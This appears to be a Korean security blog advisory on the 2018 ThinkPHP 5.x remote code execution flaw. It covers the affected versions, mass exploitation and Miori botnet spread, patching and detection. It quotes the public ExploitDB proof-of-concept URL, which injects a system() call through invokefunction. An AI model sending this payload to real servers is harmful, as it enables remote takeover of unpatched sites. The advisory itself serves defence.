요약
* ThinkPHP : 중국 개발 PHP 프레임워크로 현지 웹 개발에 많이 사용 됨
- 중국 보안업체 VulnSpy가 취약점 PoC 코드를 12/11일 ExploitDB에 올린 뒤, 해당 취약점을 이용해 약 45,000개의 중국 웹사이트가 공격 당함
- 취약점 : invokeFunction 메소드의 취약점을 이용해 공격자는 원격으로 서버에 악성 코드를 실행 할 수 있고, 서버를 컨트롤 할 수 있음.
- 대표 공격자 그룹 : D3c3mb3 - ThinkPHP취약점을 이용해 서버에 Miori IoT 악성코드 전파 (Miori: Mirai 변종)
(다양한 공격자 그룹이 ThinkPHP 스캔을 통해 공격 목표 대상을 찾고 있음)
- Shondan, ThinkPHP 검색 = 총 45,800개 (40,000 이상이 중국 IP/ 한국 = 315개)
(*ThinkPHP 설명서는 중국어만 존재해 중국 사용자가 대다수로 추정)
- 영향받는 제품 : ThinkPhP 5.0.20, 5.1.30
- 대응방안 : ThinkPHP 5.0.23, 5.1.31 혹은 최신 버전으로 업데이트
관련 CVE정보
- 현재(2018.12.24 14:00) 없음
- PoC : https://www.exploit-db.com/exploits/45978
# Exploit Title: ThinkPHP 5.x < v5.0.23,v5.1.31 Remote Code Execution
# Date: 2018-12-11
# Exploit Author: VulnSpy
# Vendor Homepage: https://thinkphp.cn
# Software Link: https://github.com/top-think/framework/
# Version: v5.x below v5.0.23,v5.1.31
# CVE: N/A
# Exploit
http://server/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=php%20-r%20'phpinfo();'
탐지룰 존재유무
-F5 BIG-IP ASM : ThinkPHP Spoofed Controller Name Remote Code Execution
참고자료
F5 PoC 설명 : https://devcentral.f5.com/articles/thinkphp-5x-remote-code-execution-vulnerability-32902
Trend Micro 분석 : https://blog.trendmicro.com/trendlabs-security-intelligence/with-mirai-comes-miori-iot-botnet-delivered-via-thinkphp-remote-code-execution-exploit/
출처 : https://www.zdnet.com/article/chinese-websites-have-been-under-attack-for-a-week-via-a-new-php-framework-bug/#ftag=RSSbaffb68
'Vulnerability' 카테고리의 다른 글
| [2018.12.26] WibuKey 커널 메모리 누출 취약점(CVE-2018-3989) (0) | 2019.03.15 |
|---|---|
| [2018.12.26] WibuKey DRM 커널 레벨 원격 코드 실행 취약점 (CVE-2018-3991) (0) | 2019.03.15 |
| [2018.12.21] Windows 제로데이 취약점 (0) | 2019.03.15 |
| [2018.12.20] Cisco Adaptive Security Appliance(ASA) 소프트웨어 권한 상승 취약점(CVE-2018-15465) (0) | 2019.03.15 |
| [2018.12.20] Internet Explorer 제로데이 긴급 보안 패치 (0) | 2019.03.14 |